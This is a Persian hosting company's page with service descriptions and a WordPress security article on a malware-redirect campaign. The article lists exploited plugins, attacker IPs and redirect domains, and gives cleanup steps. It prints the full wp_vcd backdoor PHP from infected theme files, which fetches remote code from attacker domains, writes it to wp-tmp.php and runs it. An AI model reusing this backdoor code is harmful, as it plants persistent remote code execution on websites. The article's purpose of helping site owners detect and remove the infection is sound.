ورود به محیط کاربری ثبت نام

دامنه

شرکت نگاه روشن پارس هم اکنون با ثبت بیش از هزاران دامنه جهانی این افتخار را دارد تا دامنه شما را در کمترین زمان ممکن نزد یکی از معتبرترین شرکت های ثبت دامنه جهان در کشور آلمان ثبت کند همچنین با قابلیت سرویس آنی شما هر ساعتی از شبانه روز می توانید دامنه خود را آنلاین ثبت بفرمایید. شما در نگاه روشن پارس مالک کامل دامنه خود هستید و به صورت آنلاین از طریق کنترل پنل کامل شرکت می توانید دامنه خود را مدیریت کنید.

میزبانی وب

سرویسهای اشتراکی همگی بر روی چهار شبکه اختصاصی شرکت نگاه روشن پارس نگهداری و میزبانی می شوند. دانش روز جهان ، اشراف کامل بر روی شبکه ، استفاده از سخت افزارهای بسیار حرفه ای ، مدیریت منابع ، سقف استفاده برای هر کاربر ، استقاده از کنترل پنل ساده و قدرتمند دایرکت ادمین و ... باعث شده است هر روزه ده ها مشتری جدید شرکت نگاه روشن پارس را به عنوان میزبان خود انتخاب کنند. باعث افتخار ماست که هم اکنون بیشتر از 5000 وب سایت فارسی از خدمات شرکت نگاه روشن پارس استقاده می کنند. امیدواریم با همت و پشتکار خود بتوانیم خدمتگذار خوبی برای هموطنان عزیزمان باشیم.

نمایندگی حجمی

با داشتن نمایندگی حجمی از شرکت نگاه روشن پارس بدون هیچگونه دردسر شما می توانید به مشتریانتان با نام تجاری خودتان هاست ساخته و بفروشید و نگران به روز بودن نرم افزار ها ، بالا بودن سرور و ... نباشید. با استفاده از کنترل پنل مدیریتی که در اختیار شما قرار داده می شود شما به صورت آنلاین و بدون نیاز به تماس با شرکت می توانید هاست مورد نظر خود را ایجاد نمایید.

سرور مجازی

شرکت نگاه روشن پارس یکی از پیشگامان صنعت مفید و مقرون به صرفه مجازی سازی در ایران است و سرورهای مجازی را همزمان باعرضه جهانی به هموطنان عزیز ارائه کرده است که با استفبال بسیار خوبی از طرف مشتریان عزیز قرار گرفته است

- امکان انتخاب موقعیت جغرافیایی سرور بین ایران - اروپا و آمریکا
- امکان انتخاب سیستم عامل لینوکس و ویندوز
- امکان انتخاب توزیع های محبوب لینوکس و تحویل آنی سرویس
- امکان تهیه سرور مجازی لینوکس دایرکت ادمین

سرور اختصاصی هوشمند

سرورهای اختصاصی هوشمند محصولی از شرکت نگاه روشن پارس است که در آن سرورهای اختصاصی توسط مجازی سازی سبک و بهینه شده بر روی سخت افزاری کاملا اختصاصی ایجاد میشوند.
این محصول به ما این امکان را میدهد که طیف وسیعی از امکانات همانند تحویل آنی - به روز رسانی راحتر و کنترل پنل مدیریتی فوق العاده را برای کاربران عزیزمان فراهم کنیم.

سرور اختصاصی

شرکت نگاه روشن پارس از معدود شرکتهای میزبانی وب در ایران است که خود مالک شبکه های اختصاصی ، سرورها ، کلیه تجهیزات شبکه ، IP ها و... در چهار شهر از جهان است و همزمان به دهها شرکت همکار دیگر خدمات ارائه می دهد. شما می توانید طیف وسیعی از سرورها را به صورت آماده در لیست سرورهای اختصاصی ایران و خارج از کشور انتخاب و خرید نمایید همچنین در صورت نیاز به شرایط خاص و سرورهای ویژه با شرکت نگاه روشن پارس تماس حاصل فرمایید. نصب رایگان مجازی ساز ها ، ارائه کنترل پنل های تحت وب برای میزبانی وب و سرورهای مجازی ساز و ارائه سرورهای کاملا مدیریت شده لینوکس و ... باعث شده است تا مشتریان با اطمینان خاطر بیشتری شرکت نگاه روشن پارس را برای همکاری انتخاب نمایند.

خدمات دیتاسنتر

نگاه روشن پارس با توجه به داشتن متخصصین دارای مدارک شبکه سیسکو ، میکروتیک و ... از یک سو و متخصصین دارای مدارک لینوکس و تجربه 10 ساله در زمینه میزبانی وب و دیتاسنتر بستری مناسب را برای ارائه خدمات دیتاسنتر به هموطنان عزیز فراهم کرده است. خدماتی همچون مشاوره ، نصب و راه اندازی ، مدیریت ، بهینه سازی اتاق های سرور و تهیه و نصب تمامی تجهیزات Passive و Active به صورت استاندارد و با صرف هزینه های مقرون به صرفه از ویژگی های خدمات دیتاسنتر شرکت می باشد. همچنین ارائه Colocation در ایران و خارج با قابلیت مدیریت نرم افزاری رایگان بر روی سرورهای لینوکس و نصب مجازی سازها و سیستم عامل های مختلف دنیا با بستر چند گیگابیتی بر روی شبکه ایران و شبکه بیست گیگابیتی بر روی خارج از کشور از جمله خدمات شرکت می باشد.

گواهینامه معتبر SSL

رد و بدل شدن اطلاعات بین کاربران و سایت با داشتن SSL معتبر و استفاده از پروتکل https رمزنگاری شده و باعث اطمینان بخشی بیشتر کاربران به سایت شما و بالابردن امنیت سایت شما می شود.

برنامه نویسی تحت وب

تولید و ارائه نرم افزارهای تحت وب ، پرتالهای سازمانی ، اتوماسیون های تحت وب ، اموزش تحت وب و ... با استفاده از تکنولوژی ها و آخرین متد های روز دنیا با استفاده از زبانهای PHP,MySql,Html5,Css3,Jquery,Ajax,JavaScript و ... از دیگر خدمات شرکت نگاه روشن پارس به شمار می رود کارنامه موفق شرکت در تولید پرتال تحت وب مهر و آفتاب که در حال حاضر بیش از 500 وب سایت از این دو پرتال استفاده می کنند مهر تایید دیگری بر صدق گفتار و عمل شرکت نگاه روشن پارس در زمینه توسعه نرم افزاری به شمار می رود.


در طی هفته‌های گذشته، حملاتی به وردپرس گزارش شده است که موجب ریدایرکت شدن آن  به سایت‌های مخرب می‌شود، این قبیل حملات که به  Malware Redirects مشهور هستند ممکن است بلافاصله نمایان شده  یا اینکه کشف آن زمان زیادی طول بکشد.


آسیب‌پذیری‌‌هایی که به تازگی در پلاگین‌های تولید شده توسط NicDark وصله (patch) شده‌اند ، با درخواست‌های مشابه AJAX مورد سوء استفاده قرار گرفته‌اند! در این حالت در افزونه یک عمل nopriv_ AJAX ثبت شده و حتی بازدیدکننده غیر مجاز هم می‌تواند تنظیمات وردپرس را دست بگیرد .در این درخواست‌ها هر دو مورد key->value در تنظیمات وردپرس در دسترس بوده و مستقیما در دیتابیس اعمال می‌شود
این آسیب‌پذیری حتی می‌تواند به هکر امکان ویرایش دلخواه تنظیمات وردپرس را بدهد؛ برای مثال اینکه به عنوان کاربر مدیر (Administrator) ثبت نام کند!
 
چطور مشکل ریدایرکت به سایت مخرب در وردپرس را رفع کنیم
 
این کمپین از 31 جولای شروع شده و پلاگین‌های زیر را هدف قرار داده است:
 
Woocommerce User Email Verification
Yellow Pencil Visual Theme Customizer
Coming Soon and Maintenance Mode
Blog Designer
Advanced Access Manager
Bold Page Builder
Live Chat with Facebook Messenger
Yuzo Related Posts
Visual CSS style editor
WP Live Chat Support
Shape Lightbox
Hybrid Composer
All NicDark plugins
 
تزریق اسکریپت مخرب و هدایت وردپرس به سایت دیگر، می‌تواند با ویرایش هر نوع فایلی که در وردپرس بارگذاری می‌شود انجام شده و یا اینکه به طور مستقیم در دیتابیس اعمال گردد
 
  • تزریق جاوااسکریپت در فایل‌های PHP
  • ویرایش فایل‌های JS
  • تزریق اسکریپت در نوشته و برگه(دیتابیس)
  • تزریق اسکریپت در widget (دیتابیس)
  • ویرایش فایل htaccess.
 
 
در ادامه 20 آی پی برتر مرتبط بااین کمپین را مشاهده می‌کنید- آی پی‌های پر رنگ در لیست آی‌پی‌های پر حمله جهان هستند:
 
1. 192.99.38.186
2. 51.38.69.87
3. 62.210.252.196
4. 164.132.44.97
5. 159.203.81.46
6. 217.182.95.250
7. 51.255.43.81
8. 37.187.198.246
9. 54.36.246.232
10. 45.55.152.56
11. 198.199.100.240
12. 162.241.175.243
13. 188.213.175.168
14. 45.40.143.13
15. 188.213.166.219
16. 192.169.227.95
17. 193.70.2.138
18. 149.202.75.164
19. 192.169.157.142
20. 104.238.97.201
 
بیشترین مسیرهای ریدایرکت در کمپین حملات ریدایرکت به دامنه‌های زیر اشاره می‌کند:
 
wiilberedmodels.com
bullgoesdown.com
greatinstagrampage.com
gabriellalovecats.com
jackielovedogs.com
tomorrowwillbehotmaybe.com
activeandbanflip.com
developsincelock.com
blueeyeswebsite.com
cantstopwhitelines
 
دلیل اصلی هک شدن سایت‌های وردپرس، استفاده از نسخه‌های منسوخ شده وردپرس و پلاگین‌های آن می‌باشد؛ بنابراین به‌روزرسانی هسته و پلاگین‌های وردپرس به طور منظم بسیار ضروری خواهد بود.
 
کمپین حملات ریدایرکت به سایت وردپرس


راهکارهایی برای رفع مشکل ریدایرکت به سایت‌های مخرب 

قبل از انجام هر کاری از وردپرس (دیتابیس) بکاپ تهیه نمائید

wp_options را بررسی کنید چون هکر‌ها معمولا نشانی وردپرس و نشانی سایت را با هم تغییر می‌دهند؛ البته گاهی هم ممکن است اسکریپت‌های بیشتری در wp_posts یا wp_options تزریق شده باشد، که باید به دقت بررسی شود.

بسیاری از سایت‌های آلوده شده از نسخه‌های قدیمی و منسوخ شده افزونه AAM استفاده می‌کردند


فایل function.php  پوشه قالب را بررسی می‌کنیم که باید شبیه به کد زیر باشد:

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '****random looking numbers****'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{

case 'change_domain';
if (isset($_REQUEST['newdomain']))
{

if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/$tmpcontent = @file_get_contents("http://(.*)/code.php/i',$file,$matcholddomain))
{

$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}

}
}
}
break;

case 'change_code';
if (isset($_REQUEST['newcode']))
{

if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('///$start_wp_theme_tmp([sS]*)//$end_wp_theme_tmp/i',$file,$matcholdcode))
{

$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}

}
}
}
break;

default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}

die("");
}

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}

function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle   = fopen($tmpfname, "w+");
if( fwrite($handle, " {
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle   = fopen($tmpfname, "w+");
fwrite($handle, " }
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}

$wp_auth_key='12335f8c45ff73be536601a7562a3220';
if (($tmpcontent = @file_get_contents("http://www.parors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.parors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}

elseif ($tmpcontent = @file_get_contents("http://www.parors.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}

elseif ($tmpcontent = @file_get_contents("http://www.parors.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent)); 

} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent)); 

}
}

//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?>

 


وارد پوشه wp-includes شده و فایل‌های زیر را حذف نمائید:

wp-vcd.php
wp-tmp.php
wp-feed.php

با استفاده از phpMYAdmin می‌توان دیتابیس را بررسی کرد کافیست عبارات %wiilberedmodels% و %bullgoesdown%را جستجو کنید، احتمالا در نوشته‌ها یا صفحات وردپرس یا حتی تصاویر موجود در کتابخانه بتوانید اسکریپت‌های مخرب را پیدا کنید،پیشنهاد می‌کنیم از ستون post_content در جدول  wp_posts شروع کنید ،البته توجه داشته باشید که آدرس سایت بدافزار را در جدول wp_options هم می‌توانید پیدا کنید (home و site url)

جستجوی wiilberedmodels در دیتابیس از طریق phpMyAdmin

اگر جستجو به این شکل در سایت و دیتابیس برای شما سخت است می‌توانید از سایت Aw Snap استفاده نمائید که شامل ابزارهایی برای چاپ کد صفحات و تجزیه و تحلیل است؛ از این طریق باید بتوانید اسکریپت‌های مورد استفاده و کلمات کلیدی مربوط به دامنه‌های اسپم را پیدا نمائید.

در آخر هم کش wp-rocket  یا  هر افزونه کش دیگری که نصب شده را حذف نموده ، رمزعبورها را تغییر دهید، پوسته‌های بلا استفاده را حذف کرده و پلاگین‌های رایگان را به جدیدترین نسخه آپدیت نمائید. (فراموش نکنید رمز جدید دیتابیس را در wp-config  جایگزین کنید)

سایت را در حالت incognito مرورگر بررسی کرده و از پاکسازی آن مطمئن شوید.


البته همواره یک سوی امنیت در سایت‌ها ، استفاده از میزبانی وب معتبر و حرفه‌ای است که با به‌ روزرسانی به موقع بسته‌های نرم‌افزاری سمت سرور ، امنیت وردپرس را تکمیل نماید؛ برای میزبانی سایت وردپرس استفاده از هاست لینوکس حرفه ای Nvme ایران را پیشنهاد می‌کنیم.